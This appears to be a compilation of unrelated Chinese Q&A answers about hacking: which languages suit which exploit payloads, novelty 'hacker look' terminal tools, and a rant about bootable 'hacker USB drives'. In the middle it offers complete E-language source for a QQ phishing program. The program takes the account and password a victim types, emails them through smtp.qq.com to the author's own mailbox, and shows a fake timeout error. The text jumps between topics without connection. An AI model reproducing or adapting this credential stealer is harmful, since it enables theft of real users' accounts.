一般不会只使用一种语言的，取决于具体的攻击场景。 比如说需要攻击某个漏洞的时候，一般需要把一段恶意代码送到目标机器里。这段恶意代码行话叫“payload”，一般只能根据漏洞成因选择特定的编程语言：

XSS / CSRF 漏洞一般只能用 JavaScript。SQL注入一般只能构造畸形SQL语句，命令执行类的会掺一点bash、DOS命令。反序列化漏洞一般用JSON、XML等，取决于具体的数据交换语言。溢出漏洞一般用汇编、C编写shellcode，而且一般需要用到专门的 Jump-Oriented Compiler。拿Web Shell的时候，需要根据当前Web服务器配置选择相应的ASP、PHP、ASPX等语言。另外，将payload送入目标机器一般需要构造特殊的提交方式： 如果需要构造畸形HTTP请求的话，我一般选择Python，requests库真的很好用。如果需要在套接字层直接提交TCP/UDP数据的话，我一般选择C，也会考虑Python。剩下的情形对语言一般就没有强制要求了，我平时大概随心情在 Go 和 Python 之间选一个。

我给大家介绍一下如何用一些老式、比较复古的且实用的小工具来让我们瞬间成为黑客的。

虽然目前有很多漂亮的 GUI，比如 Hacker Typer：

Hacker Typer

或者 GEEKtyper.com 的网页版本：

GEEKtyper.com

上述两个小工具，每个人都可以打开网页，进行操作。

但是如果你想要看起来更老派，更专业，可以考虑使用 Cool Retro Term：

Swordfish90/cool-retro-term

它是一个终端模拟器，模仿阴极管屏幕的外观和感觉，可以看下面的图片。相比于其他终端模拟器，它被设计的更加美观、可自定义且占用很小的存储空间。

我用易语言写的一个QQ盗号源码，其中你的QQ号和小号的QQ号和密码都需要改一下。代码如下（第一个编辑框内容为帐号，第二个为密码）：.版本 2.支持库 internet.子程序 __启动窗口_创建完毕连接发信服务器 (“smtp.qq.com”, , “你小号QQ号”, “你小号QQ号密码”, ).子程序 _按钮1_被单击发送邮件 (“QQ钓鱼程序”, “帐号：” ＋ 编辑框1.内容 ＋ #换行符 ＋ “密码：” ＋ 编辑框2.内容, “你小号的QQ号”, ,，“你大号的QQ号” )信息框 (“登陆超时，错误代码：00000000x1”, 0, )

没有所谓的黑客u盘，不是说他把bt五这样的系统装到u盘里面，然后启动的时候选择优盘启动。

这样就进入渗透系统了 你连这个优盘到底是什么一回事，你都不能够理解，你就别玩什么黑客了